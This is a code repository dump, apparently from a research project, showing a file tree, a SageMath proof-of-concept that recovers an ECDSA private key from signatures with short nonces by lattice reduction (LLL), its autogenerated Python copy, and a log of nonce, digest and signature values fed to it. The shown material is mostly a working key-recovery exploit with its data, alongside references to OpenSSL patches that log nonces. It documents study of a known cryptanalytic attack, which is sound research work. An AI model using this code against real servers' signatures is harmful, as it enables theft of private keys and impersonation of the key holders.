├── .gitignore ├── PoC ├── attack_clean.sage ├── attack_clean.sage.py └── nonces_155.log ├── README.md ├── datasets ├── 1000 │ ├── client.log │ └── server.log ├── 10000 │ ├── client.log │ └── server.log └── README.md ├── setup ├── client │ ├── README.md │ ├── attack.c │ ├── offline │ │ ├── README.md │ │ ├── download.sh │ │ └── lattice.sage │ └── run_client.sh └── server │ ├── README.md │ ├── create_objects.py │ ├── openssl_patch │ ├── #unpatch.patch# │ ├── README.md │ ├── README.md~ │ ├── store_nonces.patch │ ├── store_signatures.patch │ ├── store_truncated_digests.patch │ └── unpatch.patch │ ├── run_server.sh │ ├── server.key │ └── server.pem ├── slides.key ├── slides.pdf ├── tools ├── README.md ├── create_objects.py ├── get_data_by_bitlength.py ├── get_data_by_timing.py ├── get_small_nonces_data.py ├── test_nonces_quality.py └── test_timing_of_client.py ├── whitepaper.pdf └── whitepaper ├── ecdsa_rfc4492.png ├── fail.png ├── nice_web_plot.png ├── ps3.png ├── rfc5246.png ├── serverKeyExchange.png ├── serverside.png ├── serverside_scrambled.png └── whitepaper.tex /.gitignore: -------------------------------------------------------------------------------- 1 | #* 2 | *~ 3 | .* 4 | *# -------------------------------------------------------------------------------- /PoC/attack_clean.sage: -------------------------------------------------------------------------------- 1 | # Config 2 | lattice_size = 35 # number of signatures 3 | trick = 2^163 / 2^8 # 7 leading bits 4 | print trick 5 | 6 | # Get data 7 | with open("nonces_155.log", "r") as f: 8 | content = f.readlines() 9 | 10 | digests = [] 11 | signatures = [] 12 | 13 | # Parse it 14 | for item in content[:lattice_size]: 15 | data = item.strip("\n") 16 | data = data.split(" ") 17 | data = list(truc.strip("L") for truc in data) 18 | data = map(int, data) 19 | digests.append(data[1]) 20 | signatures.append((data[2], data[3])) 21 | 22 | # get public key x coordinate 23 | pubx = 0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 24 | 25 | # and public key modulo 26 | # taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 27 | modulo = 5846006549323611672814742442876390689256843201587 28 | 29 | # Building Equations 30 | nn = len(digests) 31 | 32 | # getting rid of the first equation 33 | r0_inv = inverse_mod(signatures[0][0], modulo) 34 | s0 = signatures[0][1] 35 | m0 = digests[0] 36 | 37 | AA = [-1] 38 | BB = [0] 39 | 40 | for ii in range(1, nn): 41 | mm = digests[ii] 42 | rr = signatures[ii][0] 43 | ss = signatures[ii][1] 44 | ss_inv = inverse_mod(ss, modulo) 45 | 46 | AA_i = Mod(-1 * s0 * r0_inv * rr * ss_inv, modulo) 47 | BB_i = Mod(-1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 48 | AA.append(AA_i.lift()) 49 | BB.append(BB_i.lift()) 50 | 51 | # Embedding Technique (CVP->SVP) 52 | lattice = Matrix(ZZ, nn + 1) 53 | 54 | # Fill lattice 55 | for ii in range(nn): 56 | lattice[ii, ii] = modulo 57 | lattice[0, ii] = AA[ii] 58 | 59 | BB.append(trick) 60 | lattice[nn] = vector(BB) 61 | 62 | # LLL 63 | lattice = lattice.LLL() # should get better results with BKZ instead of LLL 64 | 65 | # If a solution is found, format it 66 | if lattice[0,-1] % modulo == trick: 67 | # get rid of (..., 1) 68 | vec = list(lattice[0]) 69 | vec.pop() 70 | vec = vector(vec) 71 | solution = -1 * vec 72 | 73 | # get d 74 | rr = signatures[0][0] 75 | ss = signatures[0][1] 76 | mm = digests[0] 77 | nonce = solution[0] 78 | 79 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 80 | 81 | print "found a key" 82 | print key 83 | -------------------------------------------------------------------------------- /PoC/attack_clean.sage.py: -------------------------------------------------------------------------------- 1 | # This file was *autogenerated* from the file attack_clean.sage 2 | from sage.all_cmdline import * # import sage library 3 | _sage_const_3 = Integer(3); _sage_const_2 = Integer(2); _sage_const_1 = Integer(1); _sage_const_0 = Integer(0); _sage_const_8 = Integer(8); _sage_const_163 = Integer(163); _sage_const_0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a = Integer(0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a); _sage_const_5846006549323611672814742442876390689256843201587 = Integer(5846006549323611672814742442876390689256843201587); _sage_const_35 = Integer(35)# Config 4 | lattice_size = _sage_const_35 # number of signatures 5 | trick = _sage_const_2 **_sage_const_163 / _sage_const_2 **_sage_const_8 # 7 leading bits 6 | print trick 7 | 8 | # Get data 9 | with open("nonces_155.log", "r") as f: 10 | content = f.readlines() 11 | 12 | digests = [] 13 | signatures = [] 14 | 15 | # Parse it 16 | for item in content[:lattice_size]: 17 | data = item.strip("\n") 18 | data = data.split(" ") 19 | data = list(truc.strip("L") for truc in data) 20 | data = map(int, data) 21 | digests.append(data[_sage_const_1 ]) 22 | signatures.append((data[_sage_const_2 ], data[_sage_const_3 ])) 23 | 24 | # get public key x coordinate 25 | pubx = _sage_const_0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 26 | 27 | # and public key modulo 28 | # taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 29 | modulo = _sage_const_5846006549323611672814742442876390689256843201587 30 | 31 | # Building Equations 32 | nn = len(digests) 33 | 34 | # getting rid of the first equation 35 | r0_inv = inverse_mod(signatures[_sage_const_0 ][_sage_const_0 ], modulo) 36 | s0 = signatures[_sage_const_0 ][_sage_const_1 ] 37 | m0 = digests[_sage_const_0 ] 38 | 39 | AA = [-_sage_const_1 ] 40 | BB = [_sage_const_0 ] 41 | 42 | for ii in range(_sage_const_1 , nn): 43 | mm = digests[ii] 44 | rr = signatures[ii][_sage_const_0 ] 45 | ss = signatures[ii][_sage_const_1 ] 46 | ss_inv = inverse_mod(ss, modulo) 47 | 48 | AA_i = Mod(-_sage_const_1 * s0 * r0_inv * rr * ss_inv, modulo) 49 | BB_i = Mod(-_sage_const_1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 50 | AA.append(AA_i.lift()) 51 | BB.append(BB_i.lift()) 52 | 53 | # Embedding Technique (CVP->SVP) 54 | lattice = Matrix(ZZ, nn + _sage_const_1 ) 55 | 56 | # Fill lattice 57 | for ii in range(nn): 58 | lattice[ii, ii] = modulo 59 | lattice[_sage_const_0 , ii] = AA[ii] 60 | 61 | BB.append(trick) 62 | lattice[nn] = vector(BB) 63 | 64 | # LLL 65 | lattice = lattice.LLL() # should get better results with BKZ instead of LLL 66 | 67 | # If a solution is found, format it 68 | if lattice[_sage_const_0 ,-_sage_const_1 ] % modulo == trick: 69 | # get rid of (..., 1) 70 | vec = list(lattice[_sage_const_0 ]) 71 | vec.pop() 72 | vec = vector(vec) 73 | solution = -_sage_const_1 * vec 74 | 75 | # get d 76 | rr = signatures[_sage_const_0 ][_sage_const_0 ] 77 | ss = signatures[_sage_const_0 ][_sage_const_1 ] 78 | mm = digests[_sage_const_0 ] 79 | nonce = solution[_sage_const_0 ] 80 | 81 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 82 | 83 | print "found a key" 84 | print key 85 | -------------------------------------------------------------------------------- /PoC/nonces_155.log: -------------------------------------------------------------------------------- 1 | 26308098502148470970204437468733256622013798296 5114477548029925335668554648256603454197624257542 5136855665956914524591727914998057900784695305423 5583257992397120517346272441926789879354254707292 2 | 35599329389388389557031066352331104897662856973 5628128194082114825796359607152367542766467615577 12552869362524749145427974597508494240658092710 2762747625566019917995978507973708768717349054693 3 | 26086855881117158758358821436067558388713985052 808185400194284930709213102777786486490233143211 3183255792216148572904537214262760088978793893092 1986866339961547604826967673272491575661579073536 4 | 31623506674859711834382087671569092798302301391 11159142129558634830422817923446376974299831797808 2080859131625261122260261040836728851380683719975 545638931506523552131422906290594722504099724302 5 | 40004210399597655168405055604814027089454909225 2864058832436943807009822289957091360918920895016 277224144321026483394827244244131646602978812947 3815779422471669596594380013459522136423092302611 6 | 37650407252836009614547870513998872383232930796 2279893367210878366680977591460653225685053317861 936145966194860454864761788521899039979791361574 4923325964202875624115524168512332976353061199276 7 | 23230489844635431121180615822571527373450267913 148556136806108747374651856720514884625451242160 4665499042146410517976220212170729217750134589390 1549048592478331306660835386999840325000232179138 8 | 28971589905297675853555731319830134133086865660 9642018920752779153603596124105409626547093045810 5642294166082249624488491858914602284417689659502 1338950125873195060566686214486391858295376210371 9 | 24988588457519732962394398264084449442050097753 8563472575336251244429567754446150621713066907115 1320349695434484293813623802340093753767323726773 3175176160239056757729413796578884535948118495536 10 | 43357853008748850850854671888682204026038596529 525238159838437216379353698617570622075517424885 4154302561710546481533673303216980264852352719991 916886384797798632661854835732246351617225771214 11 | 39483288468765321506939638228493323354452259718 7937142721473004609004627527768961732952351682425 1446386249943365439292876763392011881025816657681 3438458085407772582305166897920279834241526898582 12 | 35820903756410729395696254153229074994592931765 1765508516298099256172515187358259883538207305719 1618959063858448774609138410941083962081130000712 5438668374089155520375246458290296686424667141678 13 | 23292858492205892358561219804374342862370306305 7659036284727286923692452100639646136883310037358 3347546988660439052519338014125454225811532366743 2978512194152582661314051173281280823416751256069 14 | 34754954858445700710918119842337689187741312935 577361767682474123709888286778699529719297084445 4736488754774365082537134868120651224242796781144 2419786473002598293144630236158948054630882544305 15 | 33066157528432089414110510465895039565166316176 860648935412810369846585698961159543923001737877 4838234900644332967642627068198738241072417782775 5507127555910302150187775443417988341158351507672 16 | 32072102336032415303631047852953150345519743572 660225023904400696193587490532028522622032620953 5333808766428123045764491008655749274230314788517 1260853523788878223565196433250099252454380295560 17 | 28030732524567250016613624023372989728551008604 2223325030139568094737947326689252766755012874170 1092116605651587225906150509888491238951493788167 3624585979750721296459071237870899240183340436981 18 | 24619323691492258409686212878706791540627407334 5108301830397589549925920544539764145525348661519 208340256679949443808299438588098312703188741369 5135940780807702969554392721817992984451647219638 19 | 43568610430352103136660180854150664117342956696 5389191005222400726553414925523435369350068438990 3095033579288993290802000773661665713516638417868 5134130512391906285413765284290309213660175543849 20 | 26091913807563440726277322008245728250815559143 8621738325220430254614931372070507688422230561816 2680310442966354267620438748757514439555252101961 5188410531477125005874644926466541440430797571436 21 | 26298947639969080772875275705604400145285530019 6372514023800557511547086679621467828660701967954 5490442742992025954805791225464226790695280236031 499654336012817490651275803364675994104946894719 22 | 28063882931648282904632022111233072233258909722 10437119354731590260282493133190042954201375161934 4265447802265414840297278426023177460735930226266 5561370392758770349406500856327420276955206332538 23 | 33849846867823387567704427405274480262105912853 6727396728847380817095249780751481994337629268158 5635963605326638636633732491867340315370268557404 3325686467356991863500862729484933895330241995210 24 | 31554161993592425823077874240982519909076355766 4310031358397390640257213063277082295141375391334 2757241329803159348764218996512260890211748848280 2540201342048049682835652666817259064767975249402 25 | 34612553285980651148947391656863320874071452073 3931423039099640139211548672550436256155742917317 3405620209986431366712431815398890971950308862614 499737770290349539814980308185158252077528754733 26 | 38383864706624283441520136631361329915990069301 4437257868017172655052546283057773131632250575187 1821922727678518445971843297926452259676698991357 3227928773297941467613244201262867346393322719559 27 | 35132379351790961150661533160195044359221843588 1318410964888715112320314720669244087469770125996 1928321389603275444082368115082530586454895595768 1051345222830438621438436837890000507314079956916 28 | 25272379699478957139803242528775302942933676621 11664158112592982752374462384515476270988408634767 423406880742198641513409545395511731441975059642 113799619034165665202064929798729127425660227634 29 | 36586041748883064248200782063609032573020532238 10660702282078848173051599219857374020149746774880 4883906846395104081242622695791608012917423394574 2133937213420933316624908039168853896866955191139 30 | 26619551838136442873178156192229421995795744263 10267026151584731630189471527269182245760784295445 5242845928249101042704345159358184144380854982058 3880361218745352171580268976165492274244895134184 31 | 31130088620754321455838403284074611659394239270 3509063185497598262251085558638165888504012862753 1163649829854898750526171697991267817400749954949 3451626335078530466913099919622218479347682854569 32 | 27821160395681379633592859882446636143016653923 10474870094888746364424009573569162911555229908574 4269098909262630765059257769901165519228559222337 2889671405098070529853019416062135551805060939578 33 | 25204198980481731154942776371339619346914638675 8699724659974740767092174206379150113963649391872 3113139516159980702342948599055453837114346966339 5295939353682424223869509228353806627059252053700 34 | 40918909008898549123301410326848727803363514315 5841548438614561419770124913854968800896055546281 5570067388849686860839601678098881323397511514359 5370596402513227123537875214137424350554129864330 35 | 30899025767029566350344588654375900874731162664 10028872307936774727383320293380978241685389052619 3840954080435003739834655520092463921136429192426 964664843689181738184168919297306706647677471351 36 | 42417408614950052517812549202288531179963532923 5630826583911685897831679403858345540957317394760 225892205740250274893579938338396638298407164535 2355626930593887524225976517579339401378421942290 37 | 42004014347605460569081853054481495547512251978 6500588393542157849686287050235987543132039142180 5779329059072632000252504176637370971932686032911 3079880533428355714417157349298109194566915537364 38 | 33184386883488435847389542028170721655348290716 2456635939301807410335927526650209485532846756127 3319549665677709395710726129280782453739684261325 4641355529186332392854191578522538228415598302018 39 | 26162165789225475999455892327396925769616854938 2098394041305332730152666001432554445534216099080 4084699516272452428273596161037161402920396714529 3773608941815900228950929472276126922246634519829 40 | 24226013184012083384835084178239797464954920025 9697034774697824455345199808075030019162085835693 2449862099110239394186275831292897260895329642423 5018965050017045985959365025137527071606498852652 41 | 43908508599354285875116189644617725627498767818 3846238988872327919847059795273696203420289899 1962028840265890840149377322664632357343104936815 2437303982587497742155071176186983812198464988195 42 | 39744448008246824102686068027134149073373217353 387687668198309979858495793903025111702603294392 2877109641504010902932179217890872759831334502630 3020448534947330393482637662684015335393215829063 43 | 37673971869211776386991084147598116830250699744 5469466882401331421461596085934527048827644922419 3945373800504651015591166904349173662574208129001 3193809108420593625817844926007195957991742222553 44 | 45193061764570062829451577903161660209166527994 9798969314930869290822930875631152802632050007803 5535509526427872448603698665523766870204070860902 2745755632722391185008063417012032779324150877995 45 | 37056836289087829489790137652788251603275387099 7815867555091257579534753842211946968979674393701 1806734077448470510658161903002908949132923261137 9784574019613990422590106129545882668709828906 46 | 39296051381240984768519190922155170522290227440 5157429993544109686382655852089051911623446730203 5049422116257276196807899137308075695924548843252 4842083818524338120390245545778256072989617366887 47 | 25457192122978592636400261589598794732596783317 4808852701549305971924297354179857048849415002885 1883046959941484977811720447463048947944538161756 3411491889487148246372441944220449788807735965632 48 | 42912232206658205121007084638810227583564311052 10585947962404684116851898457894042233512495740069 5753992721495892479367107323323639317976224743543 4413823121598159850780253293242476715724916141464 49 | 26638523301654021323676674860810570538198078781 2343013003617086677786659534287953445434915422047 1774196974398441740506093287584087456367970751828 472298370337968098219925288221081717345022321483 50 | 28304411013251021802366707726109555186060197748 4223969380765106875239762513649261683617184558257 370321362424002355336575387538265638337609454801 3155987860607736198725655369676615798978416679897 51 | 43369918854388827523762568406310677394574301556 11442575744097376564425456910574965383525591010291 3749106817124352104531395969122833471793929149883 5835763673825216899763585694961499171875917916309 52 | 34323257009466743805847885819218927695110191499 10412394532754732405138203989927480306427292479246 1802131498536938341926102109699374025224350575148 5281919117262432773694681800682061868589912662085 53 | 28289778753611371316386422868597392212781296136 3251581087124567450845121940129466079683667251882 1437009925836721874478399665209651509363352088150 5576926154493270461365170689106395256119570649562 54 | 30468187038147643753059455069300575758101215402 3631770871155721664086872422044593625217458363400 4261861531224411962048828283455945262197984009446 4969388087814202432644207950316042535852938307283 55 | 35666086869986028788001627571083706007504653535 9969565743302055098266669672903865244296083300613 1924349008280796300003213800705402435236039723283 30304203225925181584950015540041682617193390261 56 | 33275930483773904892060046555161008004481821684 3819284549668909686561000511536475636010470847568 2880522615076086572513879675417352882821984244157 1582200775152975795210470102563716569529817749498 57 | 28335260761991433540380474371877106059579543106 10617508332853646834530277458972686958627435428475 4006729990940678908159875657245313546625102034434 4446775369774513432199392226376811652098822321697 58 | 42684623318382210975013222862791226170028266019 1446496000113134407889432797091779055977063565876 2784539602220015390889133570202165984845581501682 1323991208243502958316694608371257788498254353485 59 | 42429646312855957295869029238628331670173064099 11328784435132151940884198696625806881778646236333 3594512287783132646056924227988706894135925993316 952611922288628437409603649577563438259836658774 60 | 38800449641693929258268391209462382404556435680 992174624001610672609067725556739261686154755323 5550722001361874143821328260397410722370179288309 1408829677614260677886410252047897866950105638684 61 | 37774854785693227654586283185296061292171445754 6094540750978080634928669605331437465581145096111 579141183683197221853965894465780395981211544753 4473556730345237974037393112401697516414692729070 62 | 39919459660825817136989072589219806637201647289 3265520127833307488614640144540278133060905235579 4132160396047419933517994810721211551754246929607 1093544658922986559730845278818456609242108520818 63 | 38203074549860818710632141419962565227429393619 5819067323940150772686287021767577928933160631500 1350894106673096743997381823741083363093515255142 2607612845449060218942999543955270183252239069748 64 | 29960093773836408858826378343122271006762323066 2106168782538081100257539609139522280100180986796 2661701295897640220531934274799967242758089387583 4925251420284341024514865814197702137156264231126 65 | 23467183739671985687856493748547795321595173257 3367894080361962449672008988500620044846624645772 3902427398211540344217063507454054224040740298175 2193689004329746063444377548241391566678820141301 66 | 28769859486357546090241122237058620872114924268 4182522819930533844977884769485070733847410780599 4525958360077749161829674410982821148488389064805 644909759871731352288884078772231813626973428954 67 | 23671099257425469560698554258170710765281107925 3965911375469632685692109228031837365685624820816 5832225992017027980231537964537081154613350294772 1370837319595621575378317113534077239362582374546 68 | 44737053986025216466096079939303997797249452433 3216317580374806327041701930397121444666857464270 1787145103655940659346689885756038652058587503020 2538426617596675885927383895430810113179875390607 69 | 35379539849526631511019611157109464810787717937 10146373032064330436712214041714776674686279764027 2059666516745254088372070134748070146895905733538 2186055212125405872525553500656700809277860396582 70 | 24793689042147526986349604130777869459085340937 6213618790557986027363288657140321991002239978130 3510785257324289000009971178888924450106904910193 244742627524765581786461043512442921458264977602 71 | 25236810056255930443700842109723214552981096424 871251985038594982394444716847087880779863517163 4265115129680006223222190070008301359514722556250 2812196661121581571502110545776050971440610648891 72 | 33285536316402418569769662222912685280840537996 6659467434071897117516411647378663372852491512328 5178675727334457262712018910231014838047958953326 4263972659432506325642195566946929086113865636472 73 | 25180485650236561331785715324423496728672588236 11585096324050504689350223149232007912355617266889 4364572658602431041626284741515947090581356375936 4328190158975308462055647904574059515869822123907 74 | 25234497246120178027257156279634584245379551287 621087657541459274861466741686869050986499621948 2398572577775037400639727926279300495617526675582 2343366693182954406429452016259592472631020324127 75 | 42594506140057976943670764532877101231864436290 4121590512783104718945787886402330473390433192292 2528420126819838153415668634913535813843429841603 2167558009893849441603935403547104159672191991077 76 | 26913835251660647805344104454640292801170074726 6538996326599200713763694729091805324483008799116 2115387290093509308118437285524663439999588256485 2175415273431973835960623798470912964642079629234 77 | 36926293053423846909752765425993217439355156420 1446834674294310032367754757997865531491653415433 4875454863395076282579090974838400245529357575613 2265763950228288858378819897669314505780522086194 78 | 27424721167906022347572819335136229313705046833 4008387418418708535560552029783429582581589822803 5828553647133478257691082182542971578196535762623 4055206447587347833093090429761058174327216132204 79 | 31146249187813001151402375083802517073769894978 11255455349663238899918808368052126544904301048286 3806803837677000075001121589113510379157971470246 489696178382854950255503835022189071199023498439 80 | 28550939638725095023594006634905631169936389249 5567194053779089888381904417752882113912193154023 1258364708946378172930694495638020790725852467727 5447658549957505144172015066304257741426857209468 81 | 34209878766018922193802999712360995835841037597 9805085094347412443339421312081292417695999481191 1500200323118557380425888630203213694177767676701 263052408677966455332359699400951684285033503611 82 | 43409913807872038450050982116361480140907984557 9014784365051685051772251659675764477329457303007 3216990512799527705133567377412813573315199049439 5238671715830747620198405732647266361307227979378 83 | 23730502413804800944046593365880903645076754029 3018192074662405603912700415078841791183683980692 5250204026846111870967611611602560470691896868483 436726725674937708737257954782779437905791849831 84 | 40658965215501458307616305364286742190220552107 9024851306918487119805467063234153374632744418143 4729066721081097070798996202920980853089205410576 2714921765390420440395925083110294517619109063442 85 | 24454949320031331194250930202870878058513241218 8009747695777039151671599568606191156585331106720 2435875691735999494569736186662279216940796868687 4669290555023475016954140516603742596911975258927 86 | 38751780183323931139352711447661718625281334533 947571331598550849544779614515159788508169640784 475943630440712913272612073629288426143410959551 2284549599735551948347826149465491170508899851937 87 | 40925376681080060682187948234781012057230225480 1827298904921764673056179246590757269758419355118 2950394692398447674427034091099011606378525039127 3356182175945069368713336860452288813861485202069 88 | 33623092823134840975923008785462742628011240090 9423931505518084530729114905897460585675763602904 452324795308946984153547858190050180253496527624 5389700990534973129699667145056503606510369957546 89 | 38836706190576245119532981351801290719241884464 3785631869168770083425521725832376704722967892322 1768601107482255905645540070091614059887472537420 1166112136165304891147950008140907323999703126563 90 | 30662719944562086163973523131886452994410839696 10911885707881799141566506219478190623850026712301 2885319267352580326989489062498267041721951638398 5662330131773766486213259978358391732819524232969 91 | 40869517228828309348546980357008187409057133136 3186886182389280686422107506371132588565447404132 1146815165366865428833554525729004995109768993964 4915449023261625062342627400256434942706474169811 92 | 44138436829260618105893126997737532542666348758 5693194030296880186824373756060409685003021877672 903763213920934087643983244499219090387207174037 5334289102829399663465518580458695086272130185817 93 | 28841085557507883472660213578097041895286488885 2423509191747292358000491757766135052770398521698 3633612815088481647026729719188584695365805947854 1924633351305129721498112905376561778827263255229 94 | 28442097436649061095324608128415531928657241704 9089642211411068496457897341695229214244033205951 3373709375031002609860155442771816571535445763243 2733381200506810382001394823636202379242747875471 95 | 32347993056438138288170335804767427366635567147 1118284879888934740425092686809449589197593141271 5723833358825895810407914029969626478317915650746 234161052523397207605419101508941179324329438410 96 | 44408339879257196630074638317379051361544213333 8905004088365449113893519950589547864689475868053 5821609014133902841454092921304965938972598186723 1996500250854106468168593951244430379901180762726 97 | 30914471727343109452048340999229552378195345904 6931543832144587423234197339627151037016169997732 4303849947942784683411369822614265387004648411797 2534809865162646498589274194418466469548007280480 98 | 39580513200590965476104329522784678660751875578 692147269161411573293638777938253253737718858048 1311726587433158417945937689824177965516088132537 4717589980154125912916180232359172041618124297469 99 | 31242205008465259560498463901315573692780072498 96156081835900325036314283998261813419639413828 4130630235786565762544235305461728126496295168493 4672519155172004765266288615663519364356399440855 100 | 35324705091954839057071053221792225023983046253 2277022069854995464092281169056903383119813270140 3845855772493894683734876017320303566229667156510 220335531365980134340157253793245340184739964456 101 | 23699877547627578301659860352896185360896325578 6367648249394308298262608845293895233129603498988 640493889237702062806710063064906962914283405549 1572792955520312717644525283538599635254432860233 102 | 27106589632892246490499811895453536795081108639 3543684001392270276759394070964676282662422647568 3005277337986612771870499499821255545632572089903 2713604831334165728123412356187805994646791062605 103 | 42592064199710044776158988877437635439191268797 8772103072674753110339730576215335765818242567120 581689507790951186402676336265679916418064483955 3046793868070234660339902916218394194411531439244 104 | 40171216979730374544007710531161375928748156819 4339136985816148813554926407414976373686207423158 2384228036674703275577105011827577594888136864288 3419817170165750333449240702287711794816944283533 105 | 33317955777421131451202925775286874016612313277 3159905004188180544040801976138791441859895497141 2976328118345489375459056322617250914473084016366 3083046843967535007668506960444010683686825370459 106 | 39748828577533661738801004338029381183879022487 9542787757474338776672601444519773022992314087481 1758073990422120202824123682094195697315500718639 5822191032872248731594272015945837434630542494468 107 | 35627554897953780699096633087088701907885754547 4500332679545281023210005911976708287685110057179 3359212105054281535480025992342878959485817113369 5324989658743138628713174730125785041948679098388 108 | 25866221969078953658250567539147417654556065641 4568664301926680474953941362317444328934793010500 118461251180233409521538539175787862538597551145 2715244921099703405173291021194468379168889246258 109 | 25028496604090948497221966143188831645910959401 2171239934063455386804864887449971773107392156486 2354489038947152458080549288973915464988811596272 3839364772063137710627992107414767901675212261453 110 | 27691173027324148823646595936590860835459945808 1621692600465042656020473117652404725476912722233 3141080600293669356526043476877599059463417810857 1923717206439318676831552072096058806283349027856 111 | 44162365462353156921401195786967909998572139450 5337832206121186962750418116450843423789950783234 4057588898848135985638760221708398961012646570106 1126070986433334038182384937941195804379520104512 112 | 26548421994672192968284824393086465821812843280 524117176735835634897581746303810366239566121790 3940972013270953285320984212120650382818474947190 5271808648224282788569211220350143822972904838400 113 | 42883503829058964686968445002694081034846558723 4178190737746163023302670335516700918649920326311 5476069850865022508557612784899116545954984289181 1867066206734490525750847075291531500434097997717 114 | 25302167678652636510018393468809135232226945656 1868903504530846983556903430078350362114402374893 1180603936245507463824685141176686357722769548005 2065875272326649783770111599447689076475911935981 115 | 35164214224066881978497279146963808681812747726 7154608745340331079223345284330016327159741932709 5225704369781749115658116897368920797771083625697 3318662029312971640322277341312543851421331565690 116 | 42163550050287062674935134290049107716452355481 1741046644170787361767957617126453727546830038237 1325536862461507252425400537968538528798639356210 5833898485752674817167480334107878900307310712147 117 | 29060186612885557792084129042483727644074633396 11396010832376234341912687044073327480768393196056 2326070388572445757518396485224110214091015237482 4045466405766851471924294053319336137425248852734 118 | 42515569781095621601567372650971006853474811578 3897469398325891417986437537252769647922803646242 2134236966261194662483439275886533615611664626957 780363550775266558579854359770528157111107563000 119 | 31815805567865422990144139854087759855466083308 921373641816393589486479444568378860085323696308 4569256000921558845076030975215172481864875357024 2157722388776003817456377145481106076866667420997 120 | 31831116821893364264942868699832104427763039715 584584775042918643077285900077917289267756440230 3153148921859383821484567830469386763868990607675 3802501295196092675990868407906370453593086527943 121 | 29281303922565829021742326016216108211577167600 8817657564936027751315944871977059003011965107073 3693924035511756467206321822157371160801720911182 5749462376254247290310436449081102154330684944675 122 | 30628291833592442595008114069729501977016758173 4157634483563966114697321457652272375804769486149 5655994510924016048130701784453050118144047421694 3741795312532311431155123752827795703063463833817 123 | 29284853816492446804413469171935413444461451492 5664221639121674410937744839397349712647737177640 3137995581895602334239951945900607147856009274382 4798702098170225049514702177277435360185262770258 124 | 34816666863323376129124744748820296968464726067 1069492425245754595587030706810748045292729002269 2529556976420325951869431272006883814894973695249 593461412953415536488081152697133934566669338899 125 | 34629580681015900937117600564598573109310921957 5063603632846785789897698997847476205343002825505 5074657064385740662311118044138062227397356999060 1019363292170889555109806357787377732940361952044 126 | 31968167450280102416468182207419563119813907631 1003646543995328497745451521155975382658378797827 3456766096265174946345949572686109869691474803371 1172272616529113840716406761374104653643711004317 127 | 40811701877355401236547786806328392415431590715 11299614043003427593771000153608075992748648729050 1260634987446391785459200777359705199810267732882 5260560549833126497405175942026414181837381379124 128 | 30525641021897218613094724295778626845730751641 3853494446976789702611568216501001917738956407586 4245498212123850982807258251168913425114115649405 2958278706692289403981854507895778718355855161456 129 | 44822439788996492269730254201288564148493746744 1599448486242270759808329138964687855194515874585 963455086392093150115012869739501136231777640288 4189601573176584956070877790683588813412285083148 130 | 44978352916330561811801116123957072511602904988 9198934903722198351040973867900032211297728565613 4674071342722005136364720048250400096858621774677 2568826753754958480114433967695116720490377840697 131 | 28126378065265516580907044420983758583080281081 8033303631112725829558494947436141623972860824235 2077414665085903961077843538028873803308283679757 2186434101815411904861766100494513007089634628951 132 | 30145362666104423189062432509441989337864322091 1804100145599219176443833571187613963153793438368 1886217477037171597143070700494269593806213940135 4094359036900846085123149550729355028906979580241 133 | 40110161190366815030239319078401807055777927246 5378426795457686622315268196778666821669367719219 1046964927481797463201665153502281483138225801293 4818787318318607895367916323192129755693720132687 134 | 30152522010635611724874062550614627210177832378 4815522824562078866571073201507802647617009165300 2399146313214284592317504891723107198035940097306 1229629185335363149639555593823006472866036543349 135 | 42198940952235025537084209409400741718205511432 4060816472619032750739407914988239623350525545661 3049433948326336937580443127724625255386887371222 733273027483017310740855592303508928288873319127 136 | 45172615993140387018899668633583383407306377622 8550939737948086113123802401619067718308704091993 2319762788968398056493284116393355905421877087412 5641648012988949799924439413520047236667606464761 137 | 30979815440421289238500125930875291095275122407 1063793535411478687170735597154964629562791547036 2250737175461300890273868522467762245837677639632 2844235237298358738475691835414070880379585886781 138 | 38473618911888573940966775142333230684967234499 6348654043014970610154649945652489796143581818126 1593846878902018578030839900552706231555006067814 939694777019135261880218707600882584283331123719 139 | 36873746883763517107167893861087683093439691061 5779927834294876089694233373301592916290258291952 3822623085296386860182314391220211423305960584110 5097374250240908873289871393014933425359363735718 140 | 25375190685113145333491551925024789150979574358 11294960194540241721802270798494494329198487847530 1615629266724422657379759004967895915350092598758 5226684002694759792999360486216303036216044511362 141 | 29437256609987797228975435348054283182966853976 11235529182135731828047699333517848442848172425807 4853347778340787566745741262233250651132249127914 4231372146194964684355336962565065766404215948922 142 | 42809608975643606018033442364604538254034870381 4059997677120017321165148962225246696662413680827 606618755797813771907984198159693382381350094056 4510260899214139897038038885291709580278685969759 143 | 30474082684490223753912717979118097944693248996 11418454466208335024521823970496332762364402269468 2226181825765434325398532566003974311179332689253 2668766973664155884895089746337804031055602121903 144 | 41146389555014517904634452408603484207340308108 3599752473179588388084520906052693967165552147754 3377984591400812906584624278715647148051951645086 112746761081890266588203354033273702146615680958 145 | 36763281489625171887764428024316756359166735904 11396510737358959281952184047163451034758342751275 4193142630306338681579648115331632510924751273775 3503189360893392245015190936197429945033471900197 146 | 38384742679399290956295034322640482794383631943 8051637710226330512642186234598521581221635973142 347019350055029789609204739608529521917287071523 1961830231785879260526073080138313805287202386362 147 | 37460480779408356107522903414938143001232984624 10911894710065440495819056917372037469880692432976 5329469978868353434218955058804326629210256238081 4504103477413324206650641982248177750561816950637 148 | 25294686594154763602466875396819718923088039585 1335183268255036162114363531755211759992571782848 2336333136155762731055707106411154622210165867397 1204391987773333096951852161391639952137841321785 149 | 40895376588214355187933972101567903580375159112 7279560777438489217885548469076130237075144218138 2404087934572556035363111728109728317735567716621 506408872014562945090087688986810313166517091625 150 | 43129933845325173501141539992464904832822856983 6462204998911591897964066736278863495361428276373 839658091593448400986152606189948539084781875196 3860020511423323752469098619888089458185962308225 151 | 30556075420502983441033776596177814733165101731 677631360312853848863067231692317060828542922610 247527924441018339326490672725676152015442344117 1728216900633410532442472265329678269472476215505 152 | 38146999148536939213094946238027832736800900424 346017174373963316573953122459362683000709444971 2409413596717577051786497617478488951010427227279 855739919959981805839942619512011425343364150954 153 | 24837547997172747021525035259511578284505316563 11306557297032596933988466011437326282652905066905 3299886335120074225778641993656470885128020634000 